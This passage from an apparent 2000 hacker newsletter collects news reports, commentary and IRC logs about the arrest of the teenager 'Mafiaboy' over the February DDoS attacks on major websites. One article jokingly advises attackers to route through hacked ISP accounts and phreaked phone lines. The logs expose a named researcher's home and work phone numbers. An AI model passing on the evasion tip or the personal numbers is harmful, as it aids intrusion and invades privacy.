sea-foam-green brick house, as it has been for four months. The asking
price was recently reduced below $250,000 (U.S.). There is a
paved basketball court on the side.
A teenage boy who answered the door at the house late this afternoon
simply handed the visitor a lawyer's business card. Neighbors out in their
own yards told of a family that kept largely to itself. Mafiaboy's
father is divorced, and the boy and his brother were living with the
father and their stepmother.
One neighbor said the father liked to sit out on the front stoop in his
sweat suit and make loud telephone calls on his cellular telephone using
noticeably crude language.
U.S. and Canadian authorities have been monitoring the home where Mafiaboy
lives for weeks but the authorities said they did not move to make arrests
in the case until they were certain whose fingers were on the
keyboard.
Mafiaboy could be sentenced to a term of up to two years in juvenile
detention for disrupting CNN's Web site, Canadian officials said
yesterday, although they added that sentences for such crimes
typically are stiffer in the United States than in Canada.
"Young hackers, talking mostly now about 14- to 15-year-olds up to 22- or
23-year-olds, sometimes do not realize the damages they could make with
their actions," said Yves Roussell, officer in charge of the
Montreal commercial crime section of the RCMP.
Roussell said U.S. and Canadian politicians need to do a better job of
coordinating the legal penalties and sanctions for cross-border crimes,
including computer hacking, and said additional resources are
needed to fight hacking. He said the RCMP is studying the computers
and data taken from the home.
"There are literally tons of documentation and information to analyze and
scrutinize and devise and from there we will pursue our criminal
investigation," Roussell said. "We are still investigating the
case."
Vise reported from Washington.
(c) 2000 The Washington Post Company
@HWA
10.5 Mafiaboy:The Challenge of Fighting Cybercrime (Reno)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cipherwar.com/news/00/reno_2.htm
The Challenge of Fighting Cybercrime ....04.20.00
If you haven't heard, the Canadian police have arrested a 15 year-old boy
in connection with the February DDoS attacks. Canadian law protects
the suspect's privacy by prohibiting the release of Mafiaboy's true
identity. This fact alone is a refreshing change from the American way of
doing things. Arrest someone on the most pathetic evidence you can obtain,
like chat room logs, and release their identity, ruin their lives, and
then release them because there is not enough evidence.
Janet Reno, among other inadequate criminal investigators, claims that the
arrest proves that they can track down cybercriminals. Reno forgets
that an individual is innocent until proven guilty, therefore they have
not proven they can track down cybercriminals. And how long has it taken
them to even find a 15 year-old boy to pin it on? Mafiaboy was arrested in
Canada, and this is probably a good thing for him since the US Justice
Department would probably have hung him out to dry as the big bad hacker,
that he is probably not.
Just to show how ridiculous Janet Reno is, below is an excerpt, uncut, of
an address by Reno in February shortly after the DDoS attacks.
The entire "statement" can be found here:
http://www.cybercrime.gov/ag0216.htm.
The Challenge of Fighting Cybercrime
The recent attacks highlight some of the challenges we face in
combating cybercrime. The challenges come in many forms: technical
problems in tracing criminals operating online; resource issues
facing federal, state, and local law enforcement in being able to
undertake online criminal investigations and obtain evidence stored
in computers; and legal deficiencies caused by changes in
technology. I will discuss each of these briefly.
As a technical matter, the attacks like the ones we saw last week
are easy to carry out and hard to solve. The tools available to
launch such attacks are widely available. In addition, too many
companies pay inadequate attention to security issues, and are
therefore vulnerable to be infiltrated and used as launching pads
for this kind of destructive programs. Once the attacks are
carried out, it is hard to trace the criminal activity to its
source. Criminals can use a variety of methods to hide their
tracks, allowing them to operate anonymously or through masked
identities. This makes it difficult -- and sometimes impossible --
to hold the perpetrator criminally accountable.
Even if criminals do not hide identities online, we still might be
unable to find them. The design of the Internet and practices
relating to retention of information means that it is often
difficult to obtain traffic data critical to an investigation.
Without information showing which computer was logged onto a
network at a particular point in time, the opportunity to determine
who was responsible may be lost.
There are other technical challenges, as well, that we must
consider. The Internet is a global medium that does not recognize
physical and jurisdictional boundaries. A hacker -- armed with no
more than a computer and modem -- can access computers anywhere
around the globe. They need no passports and pass no checkpoints
as they commit their crimes. While we are working with our
counterparts in other countries to develop an international
response, we must recognize that not all countries are as concerned
about computer threats as we are. Indeed, some countries have weak
laws, or no laws, against computer crimes, creating a major
obstacle to solving and to prosecuting computer crimes. I am
quite concerned that one or more nations will become "safe havens"
for cybercriminals.
Resource issues are also critical. We must ensure that law
enforcement has an adequate number of prosecutors and agents --
assigned to the FBI, to the Department of Justice, to other federal
agencies, and to state and local law enforcement -- trained in the
necessary skills and properly equipped to effectively fight
cybercrime, whether it is hacking, fraud, child porn, or other
forms.
Finally, legal issues are critical. We are finding that both our
substantive laws and procedural tools are not always adequate to
keep pace with the rapid changes in technology.
Are We Supposed To Feel Sympathy For Her?
@HWA
10.6 Mafiaboy:Janet Reno licks chops over Mafiaboy arrest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Posted 20/04/2000 5:11pm by Thomas C. Greene in Washington
Janet Reno licks chops over Mafiaboy arrest
US Attorney General Janet Reno glowed with pleasure during a Wednesday
press conference as she wagged her finger and called for the Canadian
courts to punish Mafiaboy for causing DDoS mayhem on the Web back in
February.
"I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get away
with something like this scot-free," Reno told reporters, as if Mafiaboy
had already been tried and convicted. "There has got to be a remedy, there
has got to be a penalty."
Reno did stop just shy of telling the Canadian courts precisely what the
penalty ought to be. But if Mafiaboy should be convicted, his punishment
will undoubtedly be a good deal lighter than anything a malicious hacker
might get in the USA, which, it was revealed today, has achieved the
distinction of maintaining the world's largest population of citizens
locked up in cages.
Reno also took the opportunity to boast about the profound technical savvy
of her troops in the field.
"I believe this recent breakthrough demonstrates our capacity to track
down those who would abuse this remarkable new technology, and track them
down wherever they may be," Reno said.
Yeah, right. The Register recalls the very brief period of DoJ
triumphalism over Coolio's arrest and how quickly it evaporated, and
thinks that this 'recent breakthrough' demonstrates nothing so much as the
Feds' desperate need to pounce on any scapegoat they can find in hopes of
concealing how hopeless they are in tracking cyber-criminals.
The hacking underground remains wisely reluctant to believe that Mafiaboy
is more than a scapegoat, at least until evidence is produced. The scene
has been abuzz with sceptics, while the mainstream press, predictably,
appears satisfied that the Mounties have got their boy.
Meanwhile, 2600.com has posted a bogus IRC log between a staffer posing as
Mafiaboy and one 'Icee' who the magazine claims is the person responsible
for tipping the Feds to Mafiaboy's alleged DDoS attacks.
We're not entirely sure what the point of this stunt is, except perhaps to
demonstrate that anyone can pretend to be anyone else in IRC in hopes of
casting doubt on the authenticity of the Mafiaboy logs which are expected
to be produced in evidence against him at trial.
Nice try, but of course the Feds can obtain both IRC and ISP logs, so it's
not terribly hard for them to divine the true origins of IRC traffic. You
can go on line as 'Icee' and fool, say, the editors of 2600; but if the
Feds can persuade a judge to issue a trap and trace order, they will get
all the evidence needed to pin the logs on the dummy....and probably
figure out how to piece it together, or at least hire someone with a brain
to do it for them.
(Note to wannabe leet h4x0rz: IRC traffic is logged, Einstein, so always
connect through a hacked ISP account or a freebie such as NetZero where
you can register with fictional information; and always dial in from a
phreaked telephone account [preferably in Tonga or Madagascar]. If you
can't manage that much, then don't say anything in IRC that you wouldn't
announce over a bull horn in the lobby of FBI Headquarters.)
Speaking in conclusion, again as if Mafiaboy had been tried and convicted,
Reno lectured the populace on morality. "We have got to renew our efforts
to teach young people -- children -- cyber-ethics," she said.
Renew them? We were blissfully unaware that any such efforts had been
made in the first place.
@HWA
10.7 Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IS MAFIABOY REAL OR A CREATION OF THE MEDIA? 04/20/00
We'd like to officially express our skepticism on the recent arrest of a
Montreal teenager for the Denial of Service attacks back in February.
Naturally, we always have reason to be somewhat doubtful whenever the
authorities claim to know the first thing about the Internet. But in this
case, we wanted to see just how clueless they could possibly be. When the
name "mafiaboy" was first mentioned months ago, a couple of us hopped onto
IRC using that nick. Sure enough, within seconds, we were being messaged
by people who believed we were the person responsible. Amazingly, the
person who fell for it the hardest is the very person now being quoted
widely in the media as having caught the perpetrator. Now perhaps this is
all just a big coincidence. But as you can see from the IRC logs below, we
dropped a few clues that the person was in a country with snow and at one
point "accidentally" spoke French to imply the province of Quebec. We were
amazed when the blame actually landed on someone from Montreal.
A good question to ask is why we would want to cause such confusion and
mayhem. The answer is to prove a point. That all one needs to do to be
considered a suspect is change a nickname on IRC. We had absolutely NO
proof that we could provide to make this fictitious person responsible
in any way for the attacks. Yet we were believed by countless people,
including the "expert" who is taking credit for the arrest. And now we
see that the main piece of evidence against the real person who was
arrested is the fact that he was "bragging" in an IRC channel. Please.
If this is indeed the person responsible (and what a geographical
coincidence THAT would be), we'd like to see them held accountable to a
REASONABLE degree. But in order to do this fairly, the evidence must be
made public. Otherwise, we will continue to believe that the authorities
and the media are more interested in sending a message than actually
achieving justice.
-----------------------------------------------------------------------------
[We begin the log after a brief conversation explaining why and how we
are on IRC from a different address.]
READ THE LOGS CAREFULLY ALL MAY NOT BE AS IT SEEMS, IE:NO SPEED READING :-)
-----------------------------------------------------------------------------
*icee* is the "security expert" who first pointed the finger at someone
named mafiaboy, based solely on conversations he had on IRC.
- ** [mafiaboy] is 2600 staff posing as someone on IRC named mafiaboy, shortly
after his name was first reported in the news.
(Uh yeah ok ... does 2600 staff do this sort of thing often? hrm ... - Ed)
February 10, 2000 1:07:35 AM
[mafiaboy] if they are looking for this person, they sure as hell would be
*icee* now that is ALL I CAN SAY until i hear more from you
*icee* my docs are this: Michael Lyle, 408-238-3090
*icee* go to a payphone for all the fuck i care
*icee* that way, if you really want, you can take the communications out of
band.
*icee* But before i can talk to you, i need that piece of information.
[mafiaboy] one question
*icee* sure.
[mafiaboy] if you have this info. who have you told?
*icee* I can't tell you that, until you tell me the other piece
*icee* but i told no one anything that wasn't already out there.
[mafiaboy] well no one was fucking msging me an hour ago
*icee* look, i'm neither your friend nor your enemy.. i'm an interested
party
[mafiaboy] brb
*icee* I'm much closer to a friend than your enemy, though.
[mafiaboy] ok
[mafiaboy] since we need to build some trust here
[mafiaboy] let's cover some things that don't involve disclosing anything
non-public
*icee* okay.
[mafiaboy] i need to know why people just started msging me.
*icee* because information about you was disclosed about you on a news
broadcaast by my company.
[mafiaboy] you work for a news agency?
*icee* i can't tell you where that information was obtained until I build
some trust with you
*icee* no, i work for a computer security firm.
*icee* Please don't wig out at that
[mafiaboy] so is that your interest in this?
*icee* Not really.
*icee* Pieces of it.
*icee* If i can benefit myself without hurting you, i'll take advantage
of it.
*icee* But um, i've been in a situation similar to yours before
[mafiaboy] so then, why did you go to the media if no one knew yet?
*icee* i can't really talk about that until we build more trust
*icee* because everyone already knew-- just no one had broken the story
hurt you
[mafiaboy] whois everyone?
*icee* fuck.
*icee* look, i need to know more from you
*icee* before i can go into this.
[mafiaboy] well wtf
*icee* and i need to be on a secure mode of communication
[mafiaboy] "everyone" USUALLY includes the media!
*icee* i need to be assured you're not calling into a dirty provider
*icee* or you need to call me or something
*icee* and you need to provide me with that secret
*icee* so i know i'm talking to you
*icee* here's why:
*icee* i'm not doing anything illegal
*icee* but the information that i would give you
*icee* has no value
*icee* if other people get it.
*icee* if not, it stops here: I suggest you talk to a lawyer, and I wish
you honestly the best of luck.
[mafiaboy] so let me get this straight
[mafiaboy] 3 days, this is one of the top international news stories.
everyone wants to know who is responsible. the fbi and the
president make speeches saying they are clueless. You say
"everyone knows" and you fucking tell the media????
[mafiaboy] i mean
*icee* look
[mafiaboy] i'mjust trying to make sure i have the full picture
*icee* will you take a valium or something, maybe have a swig of
alcohol or three..
[mafiaboy] not that it's me or anything
*icee* and just realize the truth here: I'm trying to be your friend.
*icee* doesn't put you in any more danger
*icee* if i was a fed, and i didn't know who you are
[mafiaboy] i think perhaps you should take a step back and think about
this from my end
*icee* by now, someone would have installed logging access lists and
figured out your ultimate source address
*icee* and coordinated the data from calling records
*icee* and know exactly where you are right now.
*icee* Keeping you in the conversation this long would have been enough
*icee* but that was not my objective.
*icee* nor am i working with the FBI
[mafiaboy] i nver said you were
*icee* so please realize you're giving me nothing more, and get a secure
line of communication with me, and talk to me
[mafiaboy] i know you're not a fed. you're with Recourse Technologies in
sunny palo alto
*icee* I understand it has to be scary as fuck, and i understand i'm not
being easy to work with
*icee* oh, did you listen to our radio stuff up there in Canada, too?
[mafiaboy] you were on the radio too???
*icee* i think they're the only people i talked to who called it sunny
palo alto
*icee* I am not out to get you.
[mafiaboy] who are you fucking Shimomura?
*icee* yes.
*icee* no
*icee* I am not out to get you.
[mafiaboy] we don't even know eachotehr and you're already looking for
your markoff
*** icee has changed the topic on channel #recourse to: *mafiaboy* who
are you fucking Shimomura?
*icee* No I'm not.
*icee* I'm not trying to go down as the person who nailed you
*icee* people already did that
*icee* And i could tell you more about it
*icee* if you'd just fucking talk to me
*icee* but listen to why i can't:
*icee* if you are not the mafiaboy i think
*icee* and i reveal the information
*icee* i've destroyed its utility
*icee* and then i wouldn't have done you much of a favor now, would
i have?
[mafiaboy] if i'm already nailed, how come no raid?
*icee* do you know what flow stats are? logging access lists?
*icee* i can tell you quite clearly how you were nailed
*icee* and i can tell you why there's no raid
*icee* but i NEED INFORMATION
*icee* and the thing is
*icee* I'm willing to help you for two reasons:
[mafiaboy] it's going to be a while before i can get to another means of
communication
*icee* I was in a situation once similar to yours, sort of
*icee* and I'm hoping that if i help you a bit, maybe you'll help me a
little too
*icee* well, are you on sympatico now?
[mafiaboy] no
[mafiaboy] one question though, is it politics?
*icee* Okay, then can we take it to DCC? I consider that safe.
*icee* why you're not?
*icee* yes.
*icee* that'll buy you a couple of days at most.
[mafiaboy] they're capitalizing off it
[mafiaboy] ?
*icee* that and the fact the FBI got a little confused
*icee* it's the fact that it crosses national borders, and there's
difficult procedural problems to solve.
*icee* none of the evidence is in .ca
*icee* or very little of it.
*icee* that and the fact the FBI got a little confused
*icee* it's the fact that it crosses national borders, and there's difficult
procedural problems to solve.
*icee* none of the evidence is in .ca
*icee* or very little of it.
*** DCC CHAT (chat) request from icee[icee@dragon.ender.com
[206.79.254.229:4135]]
*** BitchX: Type /chat to answer or /nochat to close
>>> icee [icee@dragon.ender.com] requested DCC CHAT from mafiaboy
[mafiaboy] won't accept
*icee* okay.
*icee* how do we do this, then?
*** DCC Auto-closing idle dcc CHAT to icee
*icee* I'm willing to do it on your terms, within reason.
*icee* look, i'm just a 20 year old guy, i'm sitting in my computer
room, my girl's sitting here by me, we're eating pizza
[mafiaboy] ok. this whole stalling because of politics thing. is that
your analysis or do you ahve a source on this?
[mafiaboy] (i don';t need your source)
*icee* look
*icee* This is where it stops
*icee* yes i have a source
*icee* i can't say any more.
*icee* until we get out of band somehow.
[mafiaboy] i'm just trying to guage credibility here
*icee* look
*icee* hint: i used to work for exodus communications.
*icee* where is buy.com? where is ebay?
[mafiaboy] hmm
[mafiaboy] is it an official delay? 2600.com is talking about
conspiracy shit
*icee* that's where we're getting to things i don't know , but i don't
buy it's a conspiracy in my personal opinion to be honest
*icee* 2600 isn't worth the paper it's printed on
[mafiaboy] that # you gave me, where is it?
*icee* San Jose, CA.
*icee* It's my main home phone number.
*icee* I'm trusting you.
[mafiaboy] k, landline?
*icee* yes.
*icee* it'll be answered on a cordless phone if that's okay
*icee* i doubt the feds are outside my house.
*icee* And if so, they could just bug the actual line ;P
[mafiaboy] 900mhz?
*icee* or use LMOS and make it easy
*icee* 2.4GHz spread spectrum (CDMA)
[mafiaboy] k, call you from prison ;)
End log
(Remember, if you don't have any real news or real logs, just make up
your own! - Ed)
---------------------------------------------------------------------------
IRC log started Thu Feb 10 19:23
*** Value of LOG set to ON
*** mafia_boy has joined channel #recourse
*** Users on #recourse: mafia_boy Telastyn meesh ssorkin @rross icee
*** #recourse 949885504
*** mafia_boy has left channel #recourse
*** No target, neither channel nor query
*** You have been marked as being away
*** Signoff by mafiaboy detected
*icee* is that you?
[mafiaboy] no THIS is me
*icee* yah?
*icee* so what's up?
[mafiaboy] watching cnn, haha
*icee* yah?
*icee* so did you see me?
[mafiaboy] no, just started
*icee* Look, here's the deal. ssh to some account somewhere that they didn't
know about, or something, so we have a secure channel, so we can talk.
[mafiaboy] why
[mafiaboy] they dont know about this one, not yet anyway
*icee* okay, then let's take it out of band, in DCC.
*** DCC CHAT (chat) request received from icee
*** DCC CHAT connection with icee[206.79.254.229] established
=icee= okay. we talked last night, right?
[mafiaboy] yep
=icee= (i'm asking because with the circumstance, there's fair odds someone
might message me and pretend to be you)
=icee= okay, we need to solve this trust problem, and prove you are who you
say you are.. so the name of the channel.. it starts with a m. can
you tell me it?
=icee= #bifemunix is a rival.
[mafiaboy] 3090
[mafiaboy] good enough?
=icee= okay, that's good enough, but i don't know if that was the
brightest thing to say when we could be possibly listened to
=icee= Okay:
=icee= here's the deal:
=icee= the authorities have a large amount of information which has
been salvaged from machines taken into evidence, as well as:
=icee= flow statistics on routers
=icee= routers keep information on all layer 4 connections for the
purpose of ensuring quality of service
=icee= because the information is kept in the router for a length of
time, it serves as a pretty accurate way to see what host has
talked to what other host recently
=icee= sprint, mci, abovenet, and exds all worked together and put
the flow information together
=icee= they were also able to correlate information from a number
of different sources, like logging access lists on routers
=icee= From teh RUMORS i'm hearing, the only thing keeping you out of
jail at the moment is geopolitical issues, and the fact that
they don't think you're behind all of the attacks
=icee= I think the general idea is, they're going to swoop in, get
you in custody, and then when you can't talk to anyone else
or do anything else, completely fuck you over
=icee= So I have a couple of different recommendations, depending
on what road you want to take
=icee= 1) get a lawyer, surrender to custody, try to plea bargain
=icee= or 2) publically make a statement
=icee= because if you don't do something now, your ability to talk
to the rest of the world is going to be limited
=icee= if it looks like you didn't know what the fuck you were
doing, things can turn out a lot better
=icee= and I have some information, that i certainly can't say over
the phone, that could be of great value to your defense
attorneys
[mafiaboy] and whats in it for you
=icee= What is in it for me?
=icee= You pick option #1, nothing
=icee= You pick option #2, I'd like to be the person who leads you forward.
=icee= But that's also up to you
[mafiaboy] and then you write a book
=icee= I don't want to write a book
=icee= i want to sell software
[mafiaboy] i have sme software here
=icee= what's that mean?
=icee= recourse technologies is a softawre company
[mafiaboy] haha
=icee= The other thing is: i might be able to be a witness in your favor
=icee= and I could certainly help in substantiating you didn't launch all
of the attacks
=icee= I only know for certain you nailed CNN.
[mafiaboy] but you dont really
=icee= okay, here's the things i know
=icee= i know a sympatico ip, and a time; i know everyone says you did
it; and i know you use sympatico.ca
=icee= or used.
=icee= the second set of facts help me more than the FBI; but the first
is enough for them to nail you.. see?
=icee= btw, don't call me now, i'm not at home.
=icee= of course, you could call me at work, 650-565-8601 ext 107
=icee= let me tell you my personal opinions: i think denial of service
is lame as fuck
=icee= and i don't think what you did was particularly cool
=icee= i think you probably didn't realize the implications though, either
[mafiaboy] i gotta smoke and walk around a while
=icee= *nods*
=icee= Just look:
=icee= if you think carefully, and don't freak out
=icee= you can get community service, and end up picking up trash or something
=icee= for 300 hours.. not fun, but better than spending time in juvvie
[mafiaboy] oui
[mafiaboy] ack
[mafiaboy] misfire
=icee= re
=icee= so, any clue what you're going to do?
[mafiaboy] no, i was just talking to a friend on the payphone
=icee= bleh, not talking to me anymore?
[mafiaboy] i dont think i'm in any danger here
=icee= um, why not?
[mafiaboy] many reasons
=icee= Look:
=icee= i don't know if you've heard of me or not
=icee= but at one time i was considered the very, very best
=icee= and i don't possibly understand how you could consider your position
safe.
[mafiaboy] why arent you best any more
=icee= you have lots of people who are willing to rat on you who saw
you demonstrating your might, there's definite information which
ties you to a dialup address.. and i don't see what diversion you
could have done through the phone system to adequetely protect
yourself
=icee= I'm best in something different, now.
=icee= I do mathematics and analyze networks.
=icee= I broke in to things to find out about computers and learn
=icee= once i got legitimate access to them, there wasn't a lot of
reason to do it anymore
=icee= and besides: computer security is a much tougher problem than
breaking something to take it down or break in
[mafiaboy] you still know ppl in the scene??
=icee= I know a lot of people
=icee= but to be honest:
=icee= the scene is very lame
=icee= 99.9999% today have never written exploit code
=icee= i come from a different time, and a different ethic
=icee= what we were doing used to stand for something
=icee= now it's just not the same anymore.
[mafiaboy] dont know much bout thepast
=icee= well, i'd like to tell you about it, sometime.
=icee= see, i'm sure you've read some shit by the mentor, right?
[mafiaboy] but you sound like a friend of mine
=icee= i knew the mentor, even hear from him time to time
=icee= his name came from the fact that he took an active part in taking
people new to the scene, who showed promise, and showed them how
to move forward and what to learn
=icee= i kinda have had that role in the past
=icee= a lot of people who you probably know now have learnt from me
=icee= Basically, I've never wanted attention or anything
=icee= the only reason i'm on TV now, is the fact that I have 20 people
whose livelihoods depend on the fact they've trusted me
=icee= and what is good for my company is good for them
=icee= to be honest i was terrified to death of it and wanted to go
home after the second radio interview
=icee= here's the deal though:
=icee= i'm your friend, and i'm available to provide you with information
=icee= but, these are the conditions:
=icee= I am not going to do anything that incriminates myself
=icee= and if i get subpoenaed i will cooperate, so you want to limit that
which you say to me
=icee= and if there's something you can do in the future that benefits
me, without hurting you, i'd like you to please consider it.
=icee= if you want to come forward, and get your situation known to
the public...
=icee= then i would like to facilitate that.
=icee= but it's just if you choose that road.
[mafiaboy] see
[mafiaboy] i dont know you
=icee= *nods*
=icee= and there's one last thing:
=icee= i have a piece of information which is extremely valuable in
your defense
=icee= regarding the handling of the case, and a crucial mistake
which was made
=icee= Look, you've gained favor among a little crowd, but be honest
with me, you know that almost anyone could install the tools
that you did
=icee= I could show any 12 year old who could read how to in an hour
=icee= run exploit, compile, install program, put in startup scripts
.. rinse, repeat, whatever
[mafiaboy] yes but nobody did it
=icee= but WHY do it?
[mafiaboy] snowday
[mafiaboy] haha
=icee= right now they're blaming a 500 point drop in the Dow on you;
saying you had tens of millions of dollars of economic impact
=icee= you think they're not going to put the pieces together?
=icee= there's an infinite set of different kinds of information
which can be used to nail you; forensic data on the
machines you compromised (deleted files; residues in
kernel memory if the machine was taken down), there's
residues of the information in the routers; in SNMP
audit logs in hp openview
[mafiaboy] maybe people will invest in something else and the dow
will go back up?
=icee= RADIUS logs
[mafiaboy] but nobody will give credit for that
=icee= Hey, you and I both know nothing has changed; the Dow
bounced back today, people will re-invest in ecommerce,
it won't really change anything
=icee= but the fact is: Janet Reno has put her career on the
line saying they'll catch you
=icee= and the entire FBI reports to her
=icee= and like, i don't know if you did etrade or datek, but
if you did either of those, you're likely to be
particularly fucked.
[mafiaboy] no comments
[mafiaboy] ;]
=icee= well, obviously: i don't want to know.
=icee= But i can tell you this: you're definitely fucked on CNN.
[mafiaboy] you mean aol?
=icee= well, BBN
=icee= did you just mean to take down AOL, and nailed CNN, too?
[mafiaboy] see above no comments
=icee= heh
=icee= that's a bummer
<end>
<ROFL -ed>
@HWA
10.8 Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Posted 19/04/2000 6:05pm by Thomas C. Greene in Washington
Canadian Feds charge Mafiaboy in DDoS attacks
Canadian authorities have charged a fifteen-year-old boy with
two counts of "mischief to data" for taking part in the distributed
denial of service (DDoS) attacks which shut down popular Web sites
such as Yahoo!, eBay, CNN and Amazon in February, and which finally
brought a healthy scepticism of Internet security into the mainstream
consciousness.
Royal Canadian Mounted Police Inspector Yves Roussel said they were
tipped off when the lad boasted in Internet chat rooms about what he
had done. Police obtained a warrant and searched his Montreal home,
seizing computers and software and placing the lad under arrest on 15
April, he said.
Mafiaboy appeared before a Montreal Youth Court judge on Monday and
was released, but with strict conditions.
"Considering the seriousness of the charges, and consequences derived
from the alleged actions, and in order to prevent further attacks, bail
conditions were imposed. Hence, Mafiaboy is prohibited from the use of
a computer except at school for academic reasons; and he must be under
the direct and constant supervision of a teacher or another [adult]
supervisor," Roussel said during a Wednesday press conference.
"They liked to show off that they were good at it, and that, you know,
they are the best; but it is our evaluation that Mafia boy is not that
good, actually. He had a good knowledge of computers; however, he
wasn't what we could call a genius," Roussel added.
The on-going investigation is a joint operation of the RCMP's Computer
Investigation Unit, the FBI and US Department of Justice. More arrests
could be made, Roussel indicated, but offered no further details.
"Wherever they are, [malicious] hackers will be investigated and
arrested," he warned.
@HWA
10.9 Mafiaboy:Canadian Teen Charged in Web Blitz
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Canadian Teen Charged in Web Blitz
_ Some of the Hacked Sites _
Excite: Response times slowed for about an hour and many people were
unable to get through.
E-Trade: Sporadic morning outages for a day.
ZDNet: Offline for several hours one day.
CNN: Certain areas of the site stalled for nearly two hours.
MSN: Only some customers experienced problems over a two-day period.
Amazon: Increased traffic slowed the site.
eBay: Down for most of a day.
Buy.com: Jammed for several hours.
Yahoo: Down for three hours.
Source: Staff and Wire Reports
Anatomy of the Attacks
By David A. Vise and Ariana Eunjung Cha
Washington Post Staff Writers
Thursday, April 20, 2000; Page A01
A 15-year-old Canadian computer whiz known online as "Mafiaboy"
yesterday became the first person to be charged with carrying out one
of the cyber-attacks in February that disabled a string of the Web's
most high-profile sites.
Law enforcement officials said the youth, a Montreal resident, was
arrested on the basis of evidence linking him to the attack on
CNN.com, which involved flooding the site with so many requests for
information that legitimate users were effectively locked out. The
officials said they are still investigating his potential involvement
in other strikes.
U.S. and Canadian agents working on the case declined to comment on
the probability of other arrests, but computer experts who have
worked closely with them say Mafiaboy is likely a copycat because the
assault program he used was so different from the ones used to
cripple Yahoo, the first site to go down, and several others.
The Royal Canadian Mounted Police (RCMP) arrested the youth at his
home on Saturday, seizing all his computers. He was charged with two
counts of "mischief" against the CNN site before being released to
the custody of his parents, pending trial in Montreal youth court.
Because of the suspect's age, his name and address cannot be released
under Canadian law.
The attacks, which took place Feb. 7 through 14 and also affected
Buy.com, eBay, Amazon.com and E-Trade, shut users from around the
world out of the news and trading systems they are beginning to
depend on, cost corporations millions of dollars, and showcased the
vulnerabilities of the Internet. The events caused many to question
the security of the vast World Wide Web, although no personal
financial information was compromised.
Mafiaboy could receive a maximum of two years in a juvenile detention
facility and have to pay a fine of about $680, RCMP Inspector Yves
Roussel said. But Roussel said it would be unusual for the youth to
get jail time: "Even with adults, it's rarely done that a court will
impose imprisonment for this crime."
As a condition of his release, Canadian police and U.S. Justice
Department officials said the young man is prohibited from using the
Internet, visiting stores or businesses that have computers, using
computers in an unsupervised setting, and associating with three
close friends. He is permitted to use a computer at school for
academic work, provided teachers watch his every move. He also has a
curfew, requiring him to be at home from 8 p.m. until 7 a.m. every
day.
Investigators are looking into the possibility that other hackers may
have been working with Mafiaboy. Roussel said that investigators
still had "tons" of evidence seized at Mafiaboy's house to evaluate
and that others may be charged later. Joel De La Garza, a consultant
with Palo Alto, Calif.-based security firm Securify Inc. who has been
tracking Mafiaboy for about a year, said that before the attacks on
CNN, Mafiaboy openly asked for and received technical assistance from
several other people in an online chat room so that he could break
into computers he hoped to use as launch pads for his attacks.
Mafiaboy was part of a group of youths who spent hours on a
password-protected chat channel called TNT on the Internet's original
discussion network, EFNet, which is part of Internet Relay Chat
(IRC). His group was a bunch of "script kiddies," a derisive term
used for people who use cookie-cutter hacker attack tools readily
available on the Web and don't have the skills to create their own,
De La Garza said.
Indeed, Mafiaboy and some of his friends were known to regularly take
down some of the EFNet servers using the same type of strategy that
was employed against Yahoo and the other popular sites.
"It doesn't take someone with a computer science degree or a vast
amount of technical sophistication," said Mike Vatis, head of the
FBI's National Infrastructure Protection Center, "but it does take a
concerted effort and detailed plan to break in these sites and plant
your code and deploy it."
The name Mafiaboy arose early in the FBI's investigation. Most of the
early evidence linking the alias to the attacks was based on logs of
online chats provided by private security experts at Securify,
Recourse Technologies Inc. and others. But connecting Mafiaboy to a
person and address was confusing because many people use that
moniker.
Vatis said the FBI's Atlanta and Los Angeles offices helped determine
by Feb. 12, or about five days after the computer attacks began, that
some of the strikes were coming from a telephone line in Montreal.
Two days later the FBI contacted the Canadian police. It took the
RCMP one day to identify where Mafiaboy lives, but it then took weeks
to determine who in the house was responsible for the attacks.
Early on, federal officials, private individuals and curious computer
wonks began trolling the IRC networks, popular haunts for hackers,
hoping that the culprits would brag about their achievements. Dozens
of hackers and hacker wanna-bes did claim credit for the attacks.
But Michael Lyle of security firm Recourse in Palo Alto said one
person, Mafiaboy, stood out. Lyle said he and other people from his
company engaged Mafiaboy in several online conversations. Mafiaboy
claimed to have attacked CNN.com and E-Trade, among other sites.
Those two sites went down within five to 10 minutes after Mafiaboy
announced that he would cripple them, Lyle said.
Lyle described Mafiaboy as naive: "I don't think he understood the
scope of his actions or the effects on other people. I think it was
him saying, 'Boy, wouldn't it be cool to take down sites?' "
The discovery of an attack program planted on a research computer at
the University of California at Santa Barbara the week after the
assaults began turned out to be a pivotal break in the case,
according to people familiar with the investigation.
In a typical "distributed denial of service" strike, such as the one
that disabled CNN.com, attackers first break into multiple computer
systems and plant malicious programs they activate remotely. The
"zombie" machines act in concert, flooding a target site with
requests for information, shutting out real users.
The UC-Santa Barbara computer is among the dozens to hundreds thought
to have been used in the recent attacks.
Kevin Schmidt, a network programmer on the campus, found some extra
data packets leaving the school's computer system and traced them
back to a hacked machine that was attacking CNN.com. He said the work
was "sloppy" and left an obvious trail, which he was able to trace
back to a handful of computers in the United States and Canada.
FBI Director Louis J. Freeh called the arrest of Mafiaboy a milestone
in global law enforcement efforts to battle cyber-crime. "This and
other recent cyber-crime successes demonstrate the strengths to be
drawn from an international law enforcement-private sector
partnership," he said. Among the agencies involved in the
investigation was the National Aeronautics and Space Administration,
which has often been the target of hacker attacks.
But some facts indicate at least one other party likely was involved
in the February attacks.
The software programs launched against Yahoo and eBay--the first
high-profile sites to be hit--were radically different from those
that hit CNN and E-Trade later in the week, according to security
experts.
The first were significantly more powerful than the latter programs,
according to people who have analyzed them, and who believe it makes
little sense for the attacker to have switched to an inferior strike
method.
"That's like saying I'm going to get into a fight and I'm going to
trade my Uzi in for a stick," said Securify's De La Garza, who along
with Stanford University computer administrator David Brumley has
been assisting the FBI.
Correspondent Steven Pearlstein in Toronto contributed to this report.
(c) 2000 The Washington Post Company
